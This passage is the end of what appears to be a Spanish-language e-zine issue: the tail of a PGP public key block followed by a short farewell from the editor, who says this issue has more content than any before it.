9vVTEY45BaXjM493pwaCS2UD/RXZ0G7Y4kxMKj92N3rnzAk0/MZRg4/hjWFeoggA
xP/hgYrhtOG+i4On8QOiW/uPwNBCbdpDZV9yVWUJnnyKf94GpDOIFXPuTtozMQPK
ElL18XD4N6Wjza74i16P4XTmF/LvBjQO6uqirdHg7KXkACAMXUEd2pzmsuwsZSwC
SsCrBAC1l+gVG6fTRLzXIMuYGIFa0DInElRdO9TpsVsQgVvGA7uEHZHfuqbEYbd/
M0LCmRGgziKR6vwMOVGjdrdihkXI6W1LB3lhbd/+7iLaIDqEY6ueVlxm5ykeWW7Z
XU0+WbUp1BBSRGhxG+OcjUC5WDNVPUWfyM6+4J66ruDL6D89XrQEUGFUYYkASwQQ
EQIACwUCNidBrgQLAwIBAAoJEPfOws1xxGuORS8AoIklt6Q2qrYGlq6oQBom322x
7juFAJ9ysu5iFFCh7Vu856dSGH5IYhwTJ7kDDQQ2J0GvEAwAzB13VyQ4SuLE8OiO
E2eXTpITYfbb6yUOF/32mPfIfHmwch04dfv2wXPEgxEmK0Ngw+Po1gr9oSgmC66p
rrNlD6IAUwGgfNaroxIe+g8qzh90hE/K8xfzpEDp19J3tkItAjbBJstoXp18mAkK
jX4t7eRdefXUkk+bGI78KqdLfDL2Qle3CH8IF3KiutapQvMF6PlTETlPtvFuuUs4
INoBp1ajFOmPQFXz0AfGy0OplK33TGSGSfgMg71l6RfUodNQ+PVZX9x2Uk89PY3b
zpnhV5JZzf24rnRPxfx2vIPFRzBhznzJZv8V+bv9kV7HAarTW56NoKVyOtQa8L9G
AFgr5fSI/VhOSdvNILSd5JEHNmszbDgNRR0PfIizHHxbLY7288kjwEPwpVsYjY67
VYy4XTjTNP18F1dDox0YbN4zISy1Kv884bEpQBgRjXyEpwpy1obEAxnIByl6ypUM
2Zafq9AKUJsCRtMIPWakXUGfnHy9iUsiGSa6q6Jew1XpTDJvAAICC/95sGe2RnCk
DybvxA3GsMnPuE8adlaZLXc8TntbamkLCUCMEQ1Amd6CgpGMrZklKPYXjMRg+fBg
+KysguhHfvxJQr6rvyds+/8+pe4i3pMzDNcuCgT2FeGBrqlZLrhJzGdnOJ6apsNI
/2mg3No7SzGuA5Zu35Zhsm5d6nIMNdjxotCLxDN54EVF4n4DFuUdg/FlpZhmZ1J2
JIXplg+7bMOnKrQn8udMpMYKtWftvw5xeR03hd1/F5MVCG992eBQliibHFCJ3gCw
rIponUp8n0jV/wbO9/u2SZBtTRNSpg0niZ65Uma3VCU5BKiXdrkIEK9BsvxVuATd
VWPJbLTue0V/vl6kSAzD/5kVN1aD8YqqnfIU/xl0koVcASYRmKKj/Msp2pfO+ja5
sVYB3+U7QEVR0i3nxxP2up1pl+xlhCRT7pNEGup+Z4NmKlVOLMnj15/umy5O+/Ov
rPQT7vaQTGgmdfHhkTLa5XN5za03rV/5lifnj84FB3tAuJ5vGgr2222JAEYEGBEC
AAYFAjYnQa8ACgkQ987CzXHEa47NxACfVuwLRqh5vkGJCc/BQicjzduIPZEAoL9u
ocoppCARP3t63j8QU2CUfQJ2
=vkHN
-----END PGP PUBLIC KEY BLOCK-----


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                           -=( DESPEDIDA )=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Espero que  les haya gustado. Esta vez puse mas empeo que nunca y, ademas, es
el numero con mayor contenido hasta ahora.

Les vere mas adelante ... Saludos

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-[EOT]-=-[EOF]-=-[EOT]-=-[EOF]-=-[EOT]-=-[EOF]-=-[EOT]-=-[EOF]-=-[EOT]-=-[EOF]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
